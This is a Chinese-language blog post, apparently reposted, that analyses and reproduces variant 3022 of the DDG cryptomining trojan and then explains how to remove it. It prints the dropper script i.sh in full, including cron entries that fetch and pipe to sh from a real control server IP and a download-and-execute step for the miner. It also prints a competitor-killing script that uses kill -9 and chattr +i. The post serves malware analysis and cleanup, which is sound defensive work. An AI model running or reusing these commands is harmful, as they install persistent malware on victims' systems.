生活随笔
收集整理的這篇文章主要介紹了
DDG全家桶之3022
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
本篇文章主要根據360Netlab新出的DDG分析文檔來復現新變種3022,會涉及部分分析和清除的方法,
本篇文章只用于學習交流,為廣大受害者提供清除思路 ,請勿用于非法用途,產生一切后果與作者無關
詳情請參考文檔:https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
一、下載
下載腳本:http://119.9.106.27:8000/i.sh(i.sh名稱位ddgs一貫的作風)
樣本地址:119.9.106.27:8000/static/3022/
首先下載i.sh腳本分析下里邊的內容
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/
sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
echo "" > /
var/spool/cron/
rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /
var/spool/cron/
rootmkdir -p /
var/spool/cron/
crontabs
echo "" > /
var/spool/cron/crontabs/
rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /
var/spool/cron/crontabs/
rootcd /
tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/
writeableexport PATH=
$PATH:$(pwd)
ps auxf | grep -v grep | grep lrnbbce || rm -
rf lrnbbce
if [ ! -f
"lrnbbce" ]; thenwget -q http:
//119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce
fi
chmod +
x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/
lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk
'{print $2}' | xargs kill -
9
ps auxf | grep -v grep | grep lrnbbcc | awk
'{print $2}' | xargs kill -
9
ps auxf | grep -v grep | grep lrnbbcd | awk
'{print $2}' | xargs kill -
9`
ddg木馬的老套路了,寫環境變量、添加到定時任務、下載礦機執行、刪除禁用其他挖礦木馬(挖礦行業競爭很激烈了)
從3014版本開始增加了云端配置下發 disable.sh 來集中干掉競爭對手,
腳本地址:http://119.9.106.27:8000/static/disable.sh,內容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
把同類的挖礦進程放到了這個腳本中,來殺掉yilu、以及BillGate家族的gates進程等
不過這都是之前版本的,現在這個更高級了,直接下發二進制程序disable
這個disable的作用可以參考下360的那篇文章:圖片來自360netlab博客
?
目前為了阻止其它挖礦程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖礦程序的下發
2.殺掉其它挖礦程序
3.使用二進制文件disable
二、運行復現
?接下來執行腳本開始我們的復現過程 ,crontab已經寫入
CPU已經滿載,挖礦程序已經在運行
看下/tmp目錄下的樣本文件
?
三、清除
老套路,挖礦木馬干什么咱們反著來就是了
刪除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
刪除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉進程:6Tx3Wq,lrnbbce
此時挖礦程序已經清理,后續可以刪除被增加的hosts等文件
?
參考文章:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
?
?
轉載于:https://www.cnblogs.com/Id3al/p/10706324.html
總結
以上是生活随笔為你收集整理的DDG全家桶之3022的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
